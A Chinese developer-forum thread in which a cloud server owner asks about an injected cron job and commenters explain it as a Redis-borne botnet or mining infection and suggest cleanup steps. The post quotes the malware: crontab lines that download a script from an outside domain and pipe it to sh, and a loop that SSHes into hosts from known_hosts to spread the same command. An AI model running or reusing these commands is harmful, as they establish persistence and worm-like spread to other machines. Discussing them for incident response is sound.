阿里云服务器被注入了一个 job,有人知道是什么么

2019-11-29 16:04:33 +08:00
 ppd

crontab -l:

*/15 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one)|sh

aliyun.one

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin mkdir -p /tmp chmod 1777 /tmp echo "/10 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print urllib.urlopen("http://aliyun.one").read()')|sh"|crontab - cat > /etc/crontab </dev/null 2>&1 &" & done fi for file in /home/ do if test -d $file; then if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print urllib.urlopen("http://aliyun.one").read()')|sh >/dev/null 2>&1 &" & done fi fi done #

大佬们解释一下。

7765 次点击
所在节点    程序员
32 条回复
taolu
2019-11-29 16:18:31 +08:00
肉鸡复肉鸡
hadoop
2019-11-29 16:21:32 +08:00
挖矿?
taolu
2019-11-29 16:27:56 +08:00
@taolu #1 通俗讲,就是通过你这台主机,ssh 访问已知主机,碰到可以通过密钥登录的主机,就在那台主机执行这段代码
wangyzj
2019-11-29 16:31:12 +08:00
应该还有俩相关进程在活着吧
ppd
2019-11-29 16:32:21 +08:00
@wangyzj 是的,单独杀不掉
ppd
2019-11-29 16:34:42 +08:00
@taolu 密钥应该是没有暴漏出去的,感觉是通过前几年说的那个 redis 6379 端口搞进来的
wangyzj
2019-11-29 16:34:46 +08:00
@ppd 肉鸡无疑了
删文件
删 crontab
解决机器的安全问题
mcfog
2019-11-29 16:34:54 +08:00
如果你不具备信息安全知识,那么这个时候应该做的是销毁这个实例,修改所有这个实例上曾经存在的密钥、密码、token 等信息,重新学习信息安全知识以后再重新开一个实例正确地配置服务,以免损失继续扩大
eason1874
2019-11-29 16:35:30 +08:00
这么好的域名拿来干这个,可惜
wszgrcy
2019-11-29 16:39:35 +08:00
@taolu 那么可以反制手动劫持,控制那台用脚本控制的肉鸡?
taolu
2019-11-29 16:42:08 +08:00
@wszgrcy #10 密钥登录是单向的
qsbaq
2019-11-29 16:51:43 +08:00
肉鸡变成肉鸡
ppd
2019-11-29 16:55:40 +08:00
@wangyzj
阿里云提示
“该文件极有可能是黑客成功入侵服务器植入的,建议您先根据恶意脚本的标签检查文件内容的合法性并处理”

@taolu
果然是 redis 入侵导致的

进程异常行为-Linux 系统计划任务配置文件写入行为待处理
备注处理
该告警由如下引擎检测发现:
可疑文件路径:/var/spool/cron/temp-1391.rdb
进程路径:/usr/local/bin/redis-server
进程 PID:1391
事件说明:云盾检测到服务器的计划任务配置文件写入行为存在文件变动行为。如果该行为不是您自己主动运行,可能是黑客在尝试向服务器中注入自动计划任务用于持久化入侵,请及时检查告警中的目录文件中是否含有恶意代码。
shmilypeter
2019-11-29 17:09:11 +08:00
备份好文件之后销毁实例,重装吧
ppd
2019-11-29 17:56:08 +08:00
@mcfog
@shmilypeter

无需销毁,有备份镜像
realpg
2019-11-29 17:59:36 +08:00
我猜你是 centos
Suvigotimor
2019-11-29 18:09:35 +08:00
我怀疑是 redis 无授权登录然后拿 root 之后设定的定时从远程代码托管网站获取肉鸡代码之后控制服务器的...这个好弄,找到它放文件的路径把源头删除了任务也删了,其他的清清重启就好了,redis 一定设置好授权。
okwork
2019-11-29 18:25:59 +08:00
楼主在安全组里放行了外网的 6379 端口访问?
mink
2019-11-29 18:51:42 +08:00
之前我用 docker 拉了 redis 镜像, 也是被挖矿了。
mcfog
2019-11-29 18:54:39 +08:00
@ppd 销毁是因为你没有这个能力审计出对方到底做了什么事情留了哪些后门,销毁重建是这种情况下最经济的做法
即使你有信息安全能力,一样应当备份这个被攻击的镜像(离线研究)后销毁这个实例

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/624351

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX